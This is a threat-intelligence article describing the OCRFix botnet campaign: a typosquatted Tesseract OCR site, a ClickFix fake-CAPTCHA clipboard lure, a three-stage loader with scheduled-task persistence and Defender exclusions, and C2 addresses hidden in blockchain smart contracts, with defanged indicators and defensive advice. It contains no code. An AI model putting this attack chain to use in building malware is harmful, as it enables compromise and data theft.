OCRFix Botnet Trojan: A New Cyber Threat Leveraging ClickFix Phishing and EtherHiding Techniques
A newly identified cyber threat, dubbed the OCRFix botnet trojan, has emerged, combining sophisticated social engineering tactics with blockchain-based command infrastructure to covertly compromise systems. This campaign integrates the deceptive ClickFix phishing technique with EtherHiding—a method that embeds command-and-control (C2) instructions within public blockchain networks, rendering takedown efforts exceedingly difficult.
Deceptive Entry Point
The attack initiates through a typosquatting website impersonating tesseract-ocr[.]com, a counterfeit version of the legitimate open-source Optical Character Recognition tool, Tesseract OCR. Given that the authentic Tesseract project is hosted on GitHub without a dedicated website, it becomes an easy target for domain impersonation. The malicious site employs Search Engine Optimization (SEO) poisoning and Large Language Model (LLM) poisoning, with instances where ChatGPT has been observed recommending the fraudulent site to unsuspecting users.
Phishing Mechanism
Upon visiting the deceptive site, users encounter a fake CAPTCHA prompt. Clicking to verify silently copies an obfuscated PowerShell command to their clipboard. The site then instructs users to open Windows PowerShell and paste the command, under the guise of a standard verification step. Executing this command initiates a connection to a server at opsecdefcloud[.]com, downloading a malicious MSI file (98166e51.msi) that sets the infection chain in motion. To maintain the illusion of legitimacy, victims are subsequently redirected to the genuine Tesseract GitHub page.
Multi-Stage Infection Process
The infection unfolds in three stages:
1. Initial Loader (Update1.exe): This component queries a Binance Smart Chain TestNet smart contract for the C2 address, then downloads and unpacks a data.zip package from attacker-controlled servers.
2. Persistence Mechanism (setup_helper.exe): It establishes persistence by creating a scheduled task that runs the final payload every minute with elevated privileges and adds exclusion paths to bypass Windows Defender.
3. Bot Listener (CfgHelper.exe): This stage collects the victim’s IP address, operating system details, device name, and unique identifiers, sending this data to the bot control panel at ldture[.]com.
Notably, Cyrillic comments in the panel’s source code suggest potential Russian origins of the operators, though this remains unconfirmed.
EtherHiding: Blockchain as a Command Channel
A distinctive aspect of OCRFix is its utilization of EtherHiding to store C2 addresses. Instead of directing malware to traditional servers susceptible to blocking, attackers embed their C2 URLs within smart contracts on the Binance Smart Chain TestNet. This approach complicates detection and mitigation efforts, as the blockchain’s decentralized nature makes it challenging to disrupt the C2 infrastructure.
Implications and Recommendations
The OCRFix campaign exemplifies the evolving sophistication of cyber threats, blending social engineering with advanced evasion techniques. To mitigate such risks, organizations and individuals should:
– Verify Sources: Always ensure the authenticity of websites, especially when downloading software.
– Exercise Caution with Commands: Avoid executing commands from untrusted sources, particularly those copied from websites.
– Implement Robust Security Measures: Utilize comprehensive security solutions capable of detecting and responding to multi-stage malware infections.
– Stay Informed: Regularly update knowledge on emerging cyber threats and tactics to enhance preparedness and response strategies.
By adopting these practices, users can better protect themselves against sophisticated campaigns like OCRFix, which exploit trust and technological vulnerabilities to achieve their malicious objectives.
